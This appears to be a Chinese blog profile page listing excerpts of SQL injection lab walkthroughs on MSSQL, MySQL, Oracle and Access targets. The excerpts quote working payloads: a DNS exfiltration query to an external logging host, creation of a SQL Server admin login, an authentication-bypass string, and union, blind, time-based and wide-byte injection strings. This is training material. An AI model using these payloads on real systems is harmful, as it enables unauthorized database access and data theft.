Track 实习学员

godskyhaha

0关注
0粉丝
28文章
返回网站首页

您已发布 28篇文章作品写文章

MSSQL注入 — 反弹注入

MSsql反弹注入适用场景:1、已知SQL注入点却无法进行注入2、注入工具注入时非常慢3、错误提示无法返回适用反弹注入的条件关键函数opendatasource函数外网的SQL server服务器攻击者主机中 SQL server 2000 管理权限在服务器中建立账户(所有符号为英文)exec master.dbo.sp_addlogin 账号,密码;--将你刚才建立的账号加入到管理员组,即获得管

 2018-11-5
 0 
 10 

MySQL注入 — Dns 注入

DNS平台ceye.io注册登录配置ip127.0.0.1和192.168.0.1会得到自己的DNS平台地址下文以-beb.ceye.io代替查看DNS平台MYsql数据库使用方法load_file(concat('\\\\',(select database()),'-beb.ceye.io\\abc'))打开靶场输入?id=1'没什么反应输入?id=1

 2018-11-5
 0 
 14 

Oracle注入 — 报错注入

进入靶场输入?id=1显示正常输入?id=1'报错Warning: oci_parse(): ORA-01756: quoted string not properly terminated in /home/website/default/index.php on line 13Warning: oci_execute() expects parameter 1 to be resour

 2018-11-5
 0 
 3 

Accsess注入 — 偏移注入

值得注意的是,两边的需要对齐,不然会报错进入靶场来到产品的第一个产品界面http://120.203.13.75:8001/ProductShow.asp?ID=105因为还是有WAF所以语句还是放在cookie里面注入id=105+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27+f

 2018-11-2
 0 
 11 

5.1.1、Access注入 — Cookie注入

进入靶场感觉好像是公开课的第二还是第三题打开靶场主页点击一条新闻进入http://120.203.13.75:8001/shownews.asp?id=171于是开启了Modify Headers开始Cookie注入新建Name填写CookieValue填写id=171+and+union+select+order+by+10   这里的空格一定要写+勾选前面的框URL删掉id

 2018-11-2
 0 
 16 

3.6、POST注入rank1,2,3

Post注入万能密码1' or 1=1 #绕过密码验证rank1那么用报错的方式来获得信息可以输入'order by 3 #报错回显Unknown column '3' in 'order clause''order by 2 #报错信息消失了这就可以确定为两个列爆库名' union select 1,database()#接下来的就

 2018-11-2
 0 
 18 

3.5、HEAD注入rank1,2,3

Head注入rank1Hackbar正常访问我们的User Agent被插入到了数据库了利用这点进行注入Hackbar插件,勾选Post data和User Agent用admin admin先登录一下然后load URL读出来Postdata的数据User Agent先输入个1按Execute键回显You User Agent is:1没问题再输入1'报错use near '18

 2018-11-2
 0 
 41 

3.4、延时注入rank1,2,3

延时注入主要是通过sleep()函数来增加一个睡眠时间ture则延时flase则不延时所以理论上来说还是属于盲注吧感觉原理差不多rank1?id=1' and if(ascii(sbustr(database(),1,1))>115,0,sleep(5))%23在盲注的基础多了一个if语句来判断,条件成立则运行sleep(5)rank2这里和rank1不同的地方是回显不会显示真假无论

 2018-11-2
 0 
 15 

3.3、宽字节 rank123

宽字节注入条件1、使用了addslashes函数 或 开启PHP的GPC2、数据库设置了编码为GBK,php utf-8进入靶场rank1先正常尝试?id=1回显似乎没什么问题在输入?id=1'Your sql statement is SELECT * FROM users WHERE id='1\'' LIMIT 0,1这里我们输入的'被替换成了\&#3

 2018-11-2
 0 
 27 

3.2、盲注rank1,2

盲注主要是没有回显的情况,或者说没有错误提示rank1进入靶场无论?id=几,都是只显示you are in输入?id=1 and 1=1回显:you are in...输入?id=1 and 1=2由于本身1=2这个等式是个假命题,也就是说不成立,通常情况应该爆出一些错误提示,然而这里却什么也不显示,包括you are in那么基本就可以判断这里的注入点需要用盲注来进行注入,并且这里是通过判断命

 2018-11-1
 0 
 19